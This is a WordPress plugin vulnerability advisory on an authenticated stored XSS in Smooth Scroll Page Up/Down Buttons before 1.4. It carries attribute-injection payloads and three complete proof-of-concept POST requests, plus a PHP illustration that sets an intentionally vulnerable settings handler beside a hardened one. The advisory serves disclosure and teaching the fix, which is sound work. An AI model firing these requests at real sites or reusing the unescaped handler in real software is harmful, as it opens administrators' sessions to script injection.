WordPress Plugin Vulnerabilities
Smooth Scroll Page Up/Down Buttons < 1.4 - Authenticated Stored XSS
Description
The plugin did not sanitise or validate its settings on the server side; values such as psb_distance, psb_buttonsize and psb_speed were checked only by client-side JavaScript, which an attacker bypasses simply by sending the POST request directly. This allows high-privilege users (such as administrators) to store XSS payloads in these settings. Because a valid admin session and nonce are required, the issue matters mostly on installs where administrators do not hold the unfiltered_html capability (multisite, or sites defining DISALLOW_UNFILTERED_HTML), where an admin is otherwise prevented from injecting script.
Proof of Concept
### -- [ Payloads: ]

[$] " autofocus=autofocus onfocus=alert(document.cookie); "
[$] " autofocus=autofocus onfocus=alert(document.domain); "

### -- [ PoC #1 | Authenticated Persistent XSS | Scrolling distance: ]

[!]
POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_buttonsize=13&psb_speed=13

### -- [ PoC #2 | Authenticated Persistent XSS | Button size: ]

[!]
POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.cookie%29%3B+%22&psb_speed=13

### -- [ PoC #3 | Authenticated Persistent XSS | Scrolling speed: ]

[!]
POST /wp-admin/admin-post.php HTTP/2
Host: example.com
Cookie: [admin cookies]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 289

action=save_page_scroll_buttons_options&_wpnonce=c7621ff4de&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dpagescrollupdownmenu&psb_topbutton=on&psb_positioning=0&psb_distance=13&psb_buttonsize=13&psb_speed=%22+autofocus%3Dautofocus+onfocus%3Dalert%28document.domain%29%3B+%22

The payload works by attribute injection: each stored value is echoed back into the settings form inside a double-quoted attribute, so the leading `"` closes the attribute and `autofocus`/`onfocus` become new attributes on the input, firing on page load for whoever opens the settings page. The nonce in the PoC is session-specific and must be taken from the settings form of the account being used.
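To show what "validated only client side" looks like in a WordPress option handler, and what the fix is, here is an added illustration written for this page. It is not the plugin's own code: only the admin-post action and the psb_* field names come from the PoC above; the nonce action name, the psb_settings option key, the render helpers and the numeric bounds are assumptions. The first pair of functions reproduces the vulnerable pattern; the second pair validates server side and escapes on output.

```php
<?php
// Added illustration, not the plugin's code. The action and field names come from
// the advisory's PoC; the hook wiring, option key, nonce action, render helpers and
// numeric bounds are assumptions. Requires PHP 7+ (null coalescing) and WordPress.

// --- Vulnerable pattern: nonce and capability are checked, values are not ------
function psb_save_options_vulnerable() {
    check_admin_referer( 'save_page_scroll_buttons_options' ); // assumed nonce action
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    // "13" and '" autofocus=autofocus onfocus=alert(1); "' are stored identically:
    // the only check that ever ran was the JavaScript on the settings form.
    $settings = array(
        'psb_topbutton'   => isset( $_POST['psb_topbutton'] ) ? 'on' : 'off',
        'psb_positioning' => $_POST['psb_positioning'],
        'psb_distance'    => $_POST['psb_distance'],
        'psb_buttonsize'  => $_POST['psb_buttonsize'],
        'psb_speed'       => $_POST['psb_speed'],
    );
    update_option( 'psb_settings', $settings ); // assumed option key
    wp_safe_redirect( admin_url( 'options-general.php?page=pagescrollupdownmenu' ) );
    exit;
}

function psb_render_field_vulnerable( $name, $value ) {
    // Unescaped echo into a quoted attribute. With the PoC value this emits
    // <input type="text" name="psb_distance" value="" autofocus=autofocus onfocus=alert(document.cookie); "">
    // so the browser sees two new attributes and runs the handler on focus.
    echo '<input type="text" name="' . $name . '" value="' . $value . '">';
}

// --- Hardened pattern: validate on the server, escape on output -----------------
function psb_validate_settings( array $input ) {
    // Every numeric setting is coerced to a non-negative integer and clamped, so no
    // quote or attribute text can reach the options table whatever the client sent.
    // The bounds are illustrative assumptions, not values from the plugin.
    $out = array();
    $out['psb_topbutton']   = ( isset( $input['psb_topbutton'] ) && 'on' === $input['psb_topbutton'] ) ? 'on' : 'off';
    $out['psb_positioning'] = ( '1' === (string) ( $input['psb_positioning'] ?? '0' ) ) ? 1 : 0; // assumes 0/1
    $out['psb_distance']    = min( absint( $input['psb_distance'] ?? 0 ), 10000 );              // px
    $out['psb_buttonsize']  = min( max( absint( $input['psb_buttonsize'] ?? 13 ), 1 ), 200 );    // px
    $out['psb_speed']       = min( absint( $input['psb_speed'] ?? 0 ), 60000 );                 // ms
    return $out;
}

function psb_save_options_hardened() {
    check_admin_referer( 'save_page_scroll_buttons_options' ); // assumed nonce action
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    // wp_unslash() removes the slashes WordPress adds to request data before validation.
    update_option( 'psb_settings', psb_validate_settings( wp_unslash( $_POST ) ) );
    wp_safe_redirect( admin_url( 'options-general.php?page=pagescrollupdownmenu' ) );
    exit;
}

function psb_render_field_hardened( $name, $value ) {
    // Output escaping is applied even though the value is now an integer: the
    // stored type is not something the template should have to trust.
    printf(
        '<input type="number" name="%s" value="%s">',
        esc_attr( $name ),
        esc_attr( $value )
    );
}

add_action( 'admin_post_save_page_scroll_buttons_options', 'psb_save_options_hardened' );
```

The two changes are independent and both are needed: absint() stops the payload from being stored, and esc_attr() stops any value that does reach the template from breaking out of its attribute. Fixing only the JavaScript, as the vulnerable version implicitly does, changes nothing, since the PoC never loads the form.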
Classification
Type
XSS
Miscellaneous
Original Researcher
m0ze
Submitter
m0ze
Verified
Yes
Timeline
Publicly Published
2021-05-17
Added
2021-05-17
Last Updated
2021-05-18